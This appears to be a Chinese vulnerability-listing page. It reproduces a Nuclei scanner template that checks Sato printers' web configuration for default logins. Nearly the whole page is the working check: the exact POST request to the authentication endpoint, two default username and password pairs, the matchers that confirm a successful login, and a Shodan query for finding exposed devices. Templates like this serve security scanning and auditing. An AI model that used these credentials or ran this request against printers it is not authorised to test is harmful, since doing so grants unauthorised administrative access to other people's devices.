sato-default-login: Sato - Default Login

日期: 2025-08-01 | 影响软件: sato | POC: 已公开

漏洞描述

Sato using default credentials was discovered.

PoC代码[已公开]

id: sato-default-login

info:
  name: Sato - Default Login
  author: y0no
  severity: high
  description: |
    Sato using default credentials was discovered.
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Sato"
  tags: sato,default-login,printer,vuln

http:
  - raw:
      - |
        POST /WebConfig/lua/auth.lua HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}

        group={{username}}&pw={{password}}

    attack: pitchfork

    payloads:
      username:
        - 'settings'
        - 'service'
      password:
        - '0310'
        - '6677'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"r":0'
          - 'groups":["user'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a004630440220122c0e004f2ef4ddebe9bcdcd79dbf1157268eb2075a0d8bf845b07c07ea94d8022051ac1c00b7c1b14e01af8dc8eef7f8b9e9acb052e20191438f6e1f0cd6f86ecd:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/sato/sato-default-login.yaml

相关漏洞推荐